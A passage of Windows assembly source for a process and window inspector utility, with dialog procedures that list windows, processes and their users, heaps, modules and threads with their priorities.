.setfocus:	; SETFOCUS
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	stdcall [SetFocus],eax
	jmp	.quit
.hotkey:	; HOTKEY
	cmp	[wParam],0
	jne	.unfix
	cmp	[lParam],"F" shl 16 + (MOD_ALT+MOD_CONTROL)
	jne	.unfix
	; fix
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	mov	ebx,eax
	stdcall [LockWindowUpdate],ebx
	mov	[lvi.mask],LVIF_INDENT
	and	[lvi.iItem],0
	and	[lvi.iSubItem],0
	push	OFFSET .addfix
	push	OFFSET .rmnode
.rmnode:stdcall [SendMessage],ebx,LVM_DELETEITEM,0,0
	test	eax,eax
	jz	.quit
	stdcall [SendMessage],ebx,LVM_GETITEM,0,OFFSET lvi
	test	eax,eax
	jz	@F
	cmp	[lvi.iIndent],0
	jg	.rmnode
@@:	retn	00h
.addfix:stdcall [GetCursorPos],OFFSET pt
	stdcall [WindowFromPoint],[pt.x],[pt.y]
	and	[lvi.iItem],0
	stdcall AddWindow,eax,ebx,0,0
	call	[GetForegroundWindow]
	stdcall AddWindow,eax,ebx,0,0
	stdcall [LockWindowUpdate],0
	jmp	.quit
.unfix: cmp	[wParam],1
	jne	.quit
	cmp	[lParam],"U" shl 16 + (MOD_ALT+MOD_CONTROL)
	jne	.quit
	; unfix
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	mov	ebx,eax
	mov	[lvi.mask],LVIF_INDENT
	and	[lvi.iItem],0
	and	[lvi.iSubItem],0
	push	OFFSET @F
	push	OFFSET .rmnode
	jmp	.rmnode
@@:	mov	[lvi.mask],LVIF_TEXT+LVIF_PARAM+LVIF_IMAGE
	and	[lvi.iItem],0
	and	[lvi.iSubItem],0
	mov	[lvi.pszText],OFFSET szBlank
	and	[lvi.iImage],0
	and	[lvi.lParam],0
	stdcall [SendMessage],ebx,LVM_INSERTITEM,0,OFFSET lvi
	inc	[lvi.iItem]
	stdcall [SendMessage],ebx,LVM_INSERTITEM,0,OFFSET lvi
	xor	[lvi.mask],LVIF_PARAM+LVIF_IMAGE
	dec	[lvi.iItem]
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szActiveWindow
	stdcall [SendMessage],ebx,LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iItem]
	mov	[lvi.pszText],OFFSET szCursorWindow
	stdcall [SendMessage],ebx,LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szBlank
	stdcall [SendMessage],ebx,LVM_SETITEM,0,OFFSET lvi
	dec	[lvi.iItem]
	mov	[lvi.pszText],OFFSET szBlank
	stdcall [SendMessage],ebx,LVM_SETITEM,0,OFFSET lvi
	jmp	.quit
.close: 	; CLOSE
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	mov	ebx,eax
	stdcall [GetWindowLong],ebx,GWL_USERDATA
	stdcall [SetWindowLong],ebx,GWL_WNDPROC,eax
	stdcall [UnregisterHotKey],[hWnd],1
	stdcall [UnregisterHotKey],[hWnd],0
	stdcall [DestroyMenu],[hMenuPopup]
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
.ret:	pop	edi esi ebx
	return
;##########################################################################
proc CompareItems,lParam1,lParam2,lParamSort
	enter
	push	esi edi
	xor	eax,eax
	cmp	[dwSortColumn],eax
	jne	@F
	mov	eax,[lParam1]
	sub	eax,[lParam2]
	jmp	.quit
@@:	mov	ecx,200h shr 2
	mov	edi,OFFSET szItemPrimary
	rep	stosd

	mov	eax,[lParam1]
	mov	[lvfi.flags],LVFI_PARAM
	mov	[lvfi.lParam],eax
	stdcall [SendMessage],[lParamSort],LVM_FINDITEM,-1,OFFSET lvfi
	mov	ecx,[dwSortColumn]
	mov	[lvi.mask],LVIF_TEXT
	mov	[lvi.iItem],eax
	mov	[lvi.iSubItem],ecx
	mov	[lvi.pszText],OFFSET szItemPrimary
	mov	[lvi.cchTextMax],100h
	stdcall [SendMessage],[lParamSort],LVM_GETITEM,0,OFFSET lvi

	mov	eax,[lParam2]
	mov	[lvfi.lParam],eax
	stdcall [SendMessage],[lParamSort],LVM_FINDITEM,-1,OFFSET lvfi
	mov	[lvi.iItem],eax
	mov	[lvi.pszText],OFFSET szItemSecondary
	mov	[lvi.cchTextMax],100h
	stdcall [SendMessage],[lParamSort],LVM_GETITEM,0,OFFSET lvi

	mov	esi,OFFSET szItemPrimary
	mov	edi,OFFSET szItemSecondary
	mov	ecx,100h
@@:	xor	eax,eax
	lodsb
	lcase	eax
	movzx	ecx,byte [edi]
	lcase	ecx
	sub	eax,ecx
	jnz	.quit
	inc	edi
	jmp	@B
.quit:	pop	edi esi
	return
;##########################################################################
proc WndListProc,hWnd,msg,wParam,lParam
	enter
	.if [msg],e,WM_CONTEXTMENU
		push	ebx
		stdcall [GetParent],[hWnd]
		mov	ebx,eax
		stdcall [GetWindowLong],[hWnd],GWL_ID
		mov	ecx,[hWnd]
		mov	[nmhdr.hwndFrom],ecx
		mov	[nmhdr.idFrom],ID_WIN_WINDOWS
		mov	[nmhdr.code],NM_RCLICK
		;stdcall [PostMessage],ebx,WM_NOTIFY,eax,OFFSET nmhdr
		pop	ebx
	.endif
	stdcall [GetWindowLong],[hWnd],GWL_USERDATA
	stdcall [CallWindowProc],eax,[hWnd],[msg],[wParam],[lParam]
	return
;##########################################################################
proc AddWindows,hWnd,hListView,bVisibleOnly,dwDepth,dwMaxDepth
	enter
	push	ebx
	mov	eax,[dwDepth]
	cmp	eax,[dwMaxDepth]
	ja	.quit
	stdcall [GetWindow],[hWnd],GW_CHILD
	test	eax,eax
	jz	.quit
.addwnd:mov	ebx,eax
	cmp	[bVisibleOnly],0
	jz	@F
	stdcall [IsWindowVisible],eax
	test	eax,eax
	jz	.nxwnd
@@:	stdcall AddWindow,ebx,[hListView],[dwDepth],[dwMaxDepth]
	inc	[lvi.iItem]
	mov	eax,[dwDepth]
	inc	eax
	stdcall AddWindows,ebx,[hListView],[bVisibleOnly],eax,[dwMaxDepth]
.nxwnd: stdcall [GetWindow],ebx,GW_HWNDNEXT
	test	eax,eax
	jnz	.addwnd
.quit:	pop	ebx
	return
;##########################################################################
proc AddWindow,hWnd,hListView,dwDepth,dwMaxDepth
	enter
	push	ebx
	mov	ebx,[hWnd]
	ccall	[wsprintf],OFFSET szHandle,OFFSET szHandleFormat,ebx
	stdcall [GetWindowText],ebx,OFFSET szTitle,200h
	stdcall [GetClassName],ebx,OFFSET szClass,200h
	stdcall [GetWindow],ebx,GW_CHILD
	test	eax,eax
	jz	@F
	mov	eax,[dwDepth]
	inc	eax
	cmp	eax,[dwMaxDepth]
	mov	eax,IDI_COLLAPSED
	jae	@F
	inc	eax	; IDI_EXPANDED
@@:	mov	[lvi.mask],LVIF_TEXT+LVIF_IMAGE+LVIF_PARAM
	and	[lvi.iSubItem],0
	mov	[lvi.iImage],eax
	mov	[lvi.pszText],OFFSET szHandle
	mov	[lvi.lParam],ebx
	stdcall [SendMessage],[hListView],LVM_INSERTITEM,0,OFFSET lvi
	mov	ecx,[dwDepth]
	xor	[lvi.mask],LVIF_TEXT+LVIF_IMAGE+LVIF_PARAM+LVIF_INDENT
	mov	[lvi.iItem],eax
	mov	[lvi.iIndent],ecx
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	xor	[lvi.mask],LVIF_TEXT+LVIF_INDENT
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szTitle
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szClass
	stdcall Lookup,OFFSET szClass,OFFSET classicons
	test	ecx,ecx
	jz	@F
	or	[lvi.mask],LVIF_IMAGE
	mov	[lvi.iImage],eax
@@:	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	pop	ebx
	return
;##########################################################################
proc DlgProcessesProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET processesmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan

.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_PROC_PROCESSES
	mov	ebx,eax
	mov	[lvc.mask],LVCF_SUBITEM+LVCF_TEXT
	and	[lvc.iSubItem],0
	mov	[lvc.pszText],OFFSET szColPID
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,0,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColImage
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,1,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColUser
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendMessage],ebx,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT
	stdcall [SendMessage],ebx,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall AddProcesses,ebx
	stdcall [PostMessage],ebx,LVM_SORTITEMS,ebx,OFFSET CompareItems
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,IDM_PROC_REFRESH	; Refresh
		stdcall [GetDlgItem],[hWnd],ID_PROC_PROCESSES
		push	eax	; for AddProcesses()
		mov	ebx,eax
		stdcall [SendMessage],eax,LVM_DELETEALLITEMS,0,0
		call	AddProcesses
		stdcall [PostMessage],ebx,LVM_SORTITEMS,ebx,OFFSET CompareItems
	.elseif ax,e,IDM_PROC_GOTOPARENT; Goto Parent
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	edx,OFFSET lvi
		mov	[edx+LVITEM.mask],LVIF_PARAM
		mov	[edx+LVITEM.iItem],eax
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETITEM,0,edx
		mov	[pe32.dwSize],sizeof.PROCESSENTRY32
		stdcall [CreateToolhelp32Snapshot],TH32CS_SNAPPROCESS,0
		mov	ebx,eax
		stdcall [Process32First],ebx,OFFSET pe32
	@@:	mov	eax,[pe32.th32ProcessID]
		cmp	eax,[lvi.lParam]
		mov	eax,[pe32.th32ParentProcessID]
		jne	.pskip
		and	[pe32.dwSize],0
		mov	[lvfi.flags],LVFI_PARAM
		mov	[lvfi.lParam],eax
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_FINDITEM,-1,OFFSET lvfi
		mov	edx,OFFSET lvi
		mov	[edx+LVITEM.mask],LVIF_STATE
		mov	[edx+LVITEM.iItem],eax
		mov	[edx+LVITEM.state],LVIS_SELECTED+LVIS_FOCUSED
		mov	[edx+LVITEM.stateMask],LVIS_SELECTED+LVIS_FOCUSED
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_SETITEMSTATE,eax,edx
	.pskip: stdcall [Process32Next],ebx,OFFSET pe32
		test	eax,eax
		jnz	@B
		stdcall [CloseHandle],ebx
	.elseif ax,ae,IDM_PROC_GOTOHEAPS ; Goto Heaps/Modules/Threads
		cmp	ax,IDM_PROC_GOTOTHREADS
		ja	__ELSE
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	edx,OFFSET lvi
		mov	[edx+LVITEM.mask],LVIF_PARAM
		mov	[edx+LVITEM.iItem],eax
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETITEM,0,edx
		mov	ebx,OFFSET hHeapsWnd
		cmp	word [wParam],IDM_PROC_GOTOMODULES
		jne	@F
		mov	ebx,OFFSET hModulesWnd
	@@:	cmp	word [wParam],IDM_PROC_GOTOTHREADS
		jne	@F
		mov	ebx,OFFSET hThreadsWnd
	@@:	;stdcall [SendMessage],[ebx],WM_SELECTPROCESS,[lvi.lParam],0
		mov	eax,ebx
		sub	eax,OFFSET hHeapsWnd
		shr	eax,2
		add	eax,2
		stdcall [SendDlgItemMessage],[ofn.hwndOwner],ID_MAIN_TAB
	.elseif ax,e,IDM_PROC_TERMINATE ; Terminate
		jmp	.quit
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	edx,OFFSET lvi
		mov	[edx+LVITEM.mask],LVIF_PARAM
		mov	[edx+LVITEM.iItem],eax
		stdcall [SendDlgItemMessage],[hWnd],ID_PROC_PROCESSES,LVM_GETITEM,0,edx
		mov	[szValue],0
		stdcall InputBox,OFFSET szPromptExitCode,OFFSET szValue,20h
		test	eax,eax
		jz	.quit
		stdcall ustr2dw,OFFSET szValue
		mov	esi,eax
		stdcall [OpenProcess],PROCESS_TERMINATE,0,[lvi.lParam]
		push	eax	; for CloseHandle()
		stdcall [TerminateProcess],eax,esi
		call	[CloseHandle]
	.endif
	jmp	.quit
.notify:	; NOTIFY
	cmp	[wParam],ID_WIN_WINDOWS
	jne	.quit
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_COLUMNCLICK
		mov	ecx,[eax+NMLISTVIEW.iSubItem]
		mov	[dwSortColumn],ecx
		stdcall [PostMessage],[eax+NMHDR.hwndFrom],LVM_SORTITEMS,[eax+NMHDR.hwndFrom],OFFSET CompareItems
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],1
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.endif
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_PROC_PROCESSES
	movsx	ebx,word [lParam+00h]
	movsx	ecx,word [lParam+02h]
	stdcall [MoveWindow],eax,0,0,ebx,ecx,1
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,0,72
	sub	ebx,72
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	mov	eax,ebx
	lea	eax,[eax*4+eax]        ; 5/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,1,eax
	mov	eax,ebx
	lea	eax,[eax*2+eax]        ; 3/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,2,eax
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
	pop	edi esi ebx
	return
;##########################################################################
proc AddProcesses,hListView
	enter
	push	ebx esi edi
	stdcall [SendMessage],[hListView],LVM_DELETEALLITEMS,0,0
	mov	[pe32.dwSize],sizeof.PROCESSENTRY32
	stdcall [CreateToolhelp32Snapshot],TH32CS_SNAPPROCESS,0
	mov	ebx,eax
	stdcall [Process32First],ebx,OFFSET pe32
	and	[lvi.iItem],0
	jmp	.chk
.next:	mov	eax,[pe32.th32ProcessID]
	mov	[lvi.mask],LVIF_TEXT+LVIF_PARAM
	and	[lvi.iSubItem],0
	mov	[lvi.pszText],OFFSET szHandle
	mov	[lvi.lParam],eax
	ccall	[wsprintf],OFFSET szHandle,OFFSET szValueFormat,eax
	stdcall [SendMessage],[hListView],LVM_INSERTITEM,0,OFFSET lvi
	xor	[lvi.mask],LVIF_PARAM
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET pe32.szExeFile
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
	stdcall [OpenProcess],PROCESS_QUERY_INFORMATION,0,[pe32.th32ProcessID]
	push	eax	; hProcess for CloseHandle()
	push	eax	; hToken for CloseHandle()
	stdcall [OpenProcessToken],eax,TOKEN_QUERY,esp
	push	0
	stdcall [GetTokenInformation],[esp+14h],TokenUser,0,0,esp
	stdcall [GlobalAlloc],GMEM_MOVEABLE,[esp]
	push	eax eax ; hMemory for GlobalUnlock(), GlobalFree()
	stdcall [GlobalLock],eax
	mov	esi,eax
	push	eax
	stdcall [GetTokenInformation],[esp+20h],TokenUser,esi,[esp+10h],esp
	pop	eax
	cmp	dword [esp+08h],0
	je	@F
	mov	edx,OFFSET szValue
	mov	dword [edx],100h
	push	eax
	stdcall [LookupAccountSid],0,[esi],edx,edx,0,edx,esp
	pop	eax
	stdcall [FreeSid],[esi]
	inc	[lvi.iSubItem]
	mov	[lvi.pszText],OFFSET szValue
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
@@:	call	[GlobalUnlock]
	call	[GlobalFree]
	pop	eax
	call	[CloseHandle]
	call	[CloseHandle]
	stdcall [Process32Next],ebx,OFFSET pe32
.chk:	test	eax,eax
	jnz	.next
	stdcall [CloseHandle],ebx
	pop	edi esi ebx
	return
;##########################################################################
proc DlgHeapsProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET heapsmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan

.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_HEAPS_HEAPS
	mov	ebx,eax
	mov	[lvc.mask],LVCF_SUBITEM+LVCF_TEXT
	and	[lvc.iSubItem],0
	mov	[lvc.pszText],OFFSET szColPID
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,0,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColImage
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,1,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColUser
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendMessage],ebx,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT
	stdcall [SendMessage],ebx,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall [PostMessage],ebx,LVM_SORTITEMS,ebx,OFFSET CompareItems
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	;.if ax,e,IDM_PROC_REFRESH       ; Refresh
	;.endif
	jmp	.quit
.notify:	; NOTIFY
	cmp	[wParam],ID_WIN_WINDOWS
	jne	.quit
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_COLUMNCLICK
		mov	ecx,[eax+NMLISTVIEW.iSubItem]
		mov	[dwSortColumn],ecx
		stdcall [PostMessage],[eax+NMHDR.hwndFrom],LVM_SORTITEMS,[eax+NMHDR.hwndFrom],OFFSET CompareItems
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],1
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.endif
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_HEAPS_HEAPS
	movsx	ebx,word [lParam+00h]
	movsx	ecx,word [lParam+02h]
	stdcall [MoveWindow],eax,0,0,ebx,ecx,1
	stdcall [SendDlgItemMessage],[hWnd],ID_HEAPS_HEAPS,LVM_SETCOLUMNWIDTH,0,72
	sub	ebx,72
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	mov	eax,ebx
	lea	eax,[eax*4+eax]        ; 5/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_HEAPS_HEAPS,LVM_SETCOLUMNWIDTH,1,eax
	mov	eax,ebx
	lea	eax,[eax*2+eax]        ; 3/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_HEAPS_HEAPS,LVM_SETCOLUMNWIDTH,2,eax
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
	pop	edi esi ebx
	return
;##########################################################################
proc DlgModulesProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET modulesmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan

.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_MOD_MODULES
	mov	ebx,eax
	mov	[lvc.mask],LVCF_SUBITEM+LVCF_TEXT
	and	[lvc.iSubItem],0
	mov	[lvc.pszText],OFFSET szColPID
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,0,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColImage
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,1,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColUser
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendMessage],ebx,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT
	stdcall [SendMessage],ebx,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall [PostMessage],ebx,LVM_SORTITEMS,ebx,OFFSET CompareItems
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	;.if ax,e,IDM_PROC_REFRESH       ; Refresh
	;.endif
	jmp	.quit
.notify:	; NOTIFY
	cmp	[wParam],ID_WIN_WINDOWS
	jne	.quit
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_COLUMNCLICK
		mov	ecx,[eax+NMLISTVIEW.iSubItem]
		mov	[dwSortColumn],ecx
		stdcall [PostMessage],[eax+NMHDR.hwndFrom],LVM_SORTITEMS,[eax+NMHDR.hwndFrom],OFFSET CompareItems
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],1
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.endif
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_MOD_MODULES
	movsx	ebx,word [lParam+00h]
	movsx	ecx,word [lParam+02h]
	stdcall [MoveWindow],eax,0,0,ebx,ecx,1
	stdcall [SendDlgItemMessage],[hWnd],ID_MOD_MODULES,LVM_SETCOLUMNWIDTH,0,72
	sub	ebx,72
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	mov	eax,ebx
	lea	eax,[eax*4+eax]        ; 5/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_MOD_MODULES,LVM_SETCOLUMNWIDTH,1,eax
	mov	eax,ebx
	lea	eax,[eax*2+eax]        ; 3/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_MOD_MODULES,LVM_SETCOLUMNWIDTH,2,eax
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
	pop	edi esi ebx
	return
;##########################################################################
proc DlgThreadsProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET threadsmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan

.initdlg:	; INITDIALOG
	stdcall [GetDlgItem],[hWnd],ID_THREADS_THREADS
	mov	ebx,eax
	mov	[lvc.mask],LVCF_SUBITEM+LVCF_TEXT
	and	[lvc.iSubItem],0
	mov	[lvc.pszText],OFFSET szColTID
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,0,OFFSET lvc
	inc	[lvc.iSubItem]
	mov	[lvc.pszText],OFFSET szColPriority
	stdcall [SendMessage],ebx,LVM_INSERTCOLUMN,1,OFFSET lvc
	stdcall [SendMessage],ebx,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT
	stdcall [SendMessage],ebx,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall [GetDlgItem],[hWnd],ID_THREADS_PROCESS
	push	eax	; for AddProcessesCombo()
	stdcall [SendMessage],eax,WM_SETFONT,[hFontFixed],0
	call	AddProcessesCombo
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if eax,e,((CBN_SELENDOK shl 16) + ID_THREADS_PROCESS)
		stdcall [SendMessage],[lParam],CB_GETCURSEL,0,0
		cmp	eax,CB_ERR
		je	.quit
		stdcall [SendMessage],[lParam],CB_GETITEMDATA,eax,0
		push	eax	; for AddThreads()
		stdcall [GetDlgItem],[hWnd],ID_THREADS_THREADS
		stdcall AddThreads,eax
	.endif
	jmp	.quit
.notify:	; NOTIFY
	cmp	[wParam],ID_WIN_WINDOWS
	jne	.quit
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_COLUMNCLICK
		mov	ecx,[eax+NMLISTVIEW.iSubItem]
		mov	[dwSortColumn],ecx
		stdcall [PostMessage],[eax+NMHDR.hwndFrom],LVM_SORTITEMS,[eax+NMHDR.hwndFrom],OFFSET CompareItems
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],1
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.endif
	jmp	.quit
.size:		; SIZE
	movsx	esi,word [lParam+00h]
	movsx	edi,word [lParam+02h]
	stdcall [GetSystemMetrics],SM_CYVTHUMB
	add	eax,8
	mov	ebx,eax
	sub	edi,eax
	stdcall [GetDlgItem],[hWnd],ID_THREADS_PROCESS
	lea	ecx,[ebx*8]
	stdcall [MoveWindow],eax,0,0,esi,ecx,1
	stdcall [GetDlgItem],[hWnd],ID_THREADS_THREADS
	stdcall [MoveWindow],eax,0,ebx,esi,edi,1
	stdcall [SendDlgItemMessage],[hWnd],ID_THREADS_THREADS,LVM_SETCOLUMNWIDTH,0,72
	sub	esi,72
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	esi,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	esi,eax
	stdcall [SendDlgItemMessage],[hWnd],ID_THREADS_THREADS,LVM_SETCOLUMNWIDTH,1,esi
	jmp	.quit
.close: 	; CLOSE
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
	pop	edi esi ebx
	return
;##########################################################################
proc AddProcessesCombo,hCombo
	enter
	push	ebx esi edi
	mov	[pe32.dwSize],sizeof.PROCESSENTRY32
	stdcall [CreateToolhelp32Snapshot],TH32CS_SNAPPROCESS,0
	mov	ebx,eax
	stdcall [Process32First],ebx,OFFSET pe32
	and	[lvi.iItem],0
	jmp	.chk
.next:	ccall	[wsprintf],OFFSET szValue,OFFSET szIDNameFormat,[pe32.th32ProcessID],OFFSET pe32.szExeFile
	stdcall [SendMessage],[hCombo],CB_ADDSTRING,0,OFFSET szValue
	stdcall [SendMessage],[hCombo],CB_SETITEMDATA,eax,[pe32.th32ProcessID]
	stdcall [Process32Next],ebx,OFFSET pe32
.chk:	test	eax,eax
	jnz	.next
	stdcall [CloseHandle],ebx
	pop	edi esi ebx
	return
;##########################################################################
proc AddThreads,hListView,pid
	enter
	push	ebx esi edi
	stdcall [SendMessage],[hListView],LVM_DELETEALLITEMS,0,0
	mov	[te32.dwSize],sizeof.THREADENTRY32
	stdcall [CreateToolhelp32Snapshot],TH32CS_SNAPTHREAD,[pid]
	mov	ebx,eax
	stdcall [Thread32First],ebx,OFFSET te32
	and	[lvi.iItem],0
	jmp	.chk
.next:	mov	ecx,[te32.th32OwnerProcessID]
	cmp	ecx,[pid]
	jne	.skip
	mov	eax,[te32.th32ThreadID]
	mov	[lvi.mask],LVIF_TEXT+LVIF_PARAM
	and	[lvi.iSubItem],0
	mov	[lvi.pszText],OFFSET szHandle
	mov	[lvi.lParam],eax
	ccall	[wsprintf],OFFSET szHandle,OFFSET szValueFormat,eax
	stdcall [SendMessage],[hListView],LVM_INSERTITEM,0,OFFSET lvi
	xor	[lvi.mask],LVIF_PARAM
	inc	[lvi.iSubItem]
	mov	esi,OFFSET threadpri
	lea	edx,[esi+4]
.pri:	lodsd
	cmp	eax,[te32.tpBasePri]
	jg	.eol
	mov	edx,esi
	je	.eol
.prskip:lodsb
	cmp	al,0
	je	.pri
	jmp	.prskip
.eol:	mov	ecx,[te32.tpBasePri]
	sub	ecx,[edx-4]
	mov	eax,OFFSET szValue
	push	eax
	ccall	[wsprintf],eax,OFFSET szVarPriority,[te32.tpBasePri],edx,ecx
	pop	eax
	mov	[lvi.pszText],eax
	stdcall [SendMessage],[hListView],LVM_SETITEM,0,OFFSET lvi
.skip:	stdcall [Thread32Next],ebx,OFFSET te32
.chk:	test	eax,eax
	jnz	.next
	stdcall [CloseHandle],ebx
	pop	edi esi ebx
	return
;##########################################################################
proc DlgMenuListProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
